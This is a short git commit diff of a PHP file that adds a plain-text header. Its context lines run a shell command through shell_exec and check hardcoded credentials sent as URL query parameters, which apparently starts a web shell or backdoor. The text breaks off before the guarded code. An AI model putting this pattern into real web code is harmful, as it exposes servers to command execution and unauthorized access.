update content header
This commit is contained in:
parent
4e37c80a36
commit
c7aae0766d
@ -1,4 +1,5 @@
|
|||||||
<?php
|
<?php
|
||||||
|
header("Content-type: text/plain");
|
||||||
echo shell_exec('whoami');
|
echo shell_exec('whoami');
|
||||||
|
|
||||||
if($_GET['usr']=='vtauth' && $_GET['pass']=='plsnohackerinokthanks') {
|
if($_GET['usr']=='vtauth' && $_GET['pass']=='plsnohackerinokthanks') {
|
||||||
|
Loading…
Reference in New Issue
Block a user